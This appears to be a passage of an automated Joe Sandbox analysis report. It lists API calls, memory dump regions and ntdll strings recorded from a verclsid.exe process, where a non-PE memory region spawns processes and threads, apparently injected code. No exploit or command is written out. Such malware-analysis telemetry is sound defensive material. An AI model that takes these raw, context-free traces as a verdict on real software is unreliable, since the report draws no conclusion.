                                                                                                                                              • String ID: @J7<
                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,1953F364,?,02EB817E,00000010,?,?,?,00000044,?,00000010,02EB817E,?,1953F364,?), ref: 02EC96F0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9DD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9DD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                              APIs
                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0C4789C2,00000007,00000000,00000004,00000000,02EB3C99,000000F4), ref: 02EC963F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(02EB18D9,?,02EC569B,02EB18D9,02EC557F,02EC569B,?,02EB18D9,02EC557F,00001000,?,?,00000000), ref: 02EC95EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02EB81EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02EB1BE0,02EC7EBF,02EC557F,02EB1BA3), ref: 02EB7FE3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                              APIs
                                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02EB0CBD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907110994.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                              • Snapshot File: hcaresult_7_2_4da0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907110994.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                              • Snapshot File: hcaresult_7_2_4da0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                              • API String ID: 0-3558027158
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                              Strings
                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04F246FC
                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04F24655
                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04F24787
                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04F24742
                                                                                                                                              • ExecuteOptions, xrefs: 04F246A0
                                                                                                                                              • Execute=1, xrefs: 04F24713
                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04F24725
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
• Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                              Strings
                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F202BD
                                                                                                                                              • RTL: Re-Waiting, xrefs: 04F2031E
                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F202E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
• Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                              Strings
                                                                                                                                              • RTL: Resource at %p, xrefs: 04F27B8E
                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04F27B7F
                                                                                                                                              • RTL: Re-Waiting, xrefs: 04F27BAC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
• Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                              APIs
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F2728C
                                                                                                                                              Strings
                                                                                                                                              • RTL: Resource at %p, xrefs: 04F272A3
                                                                                                                                              • RTL: Re-Waiting, xrefs: 04F272C1
                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04F27294
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
• Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
• Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
• Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-
                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
• Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $$@
                                                                                                                                              • API String ID: 0-1194432280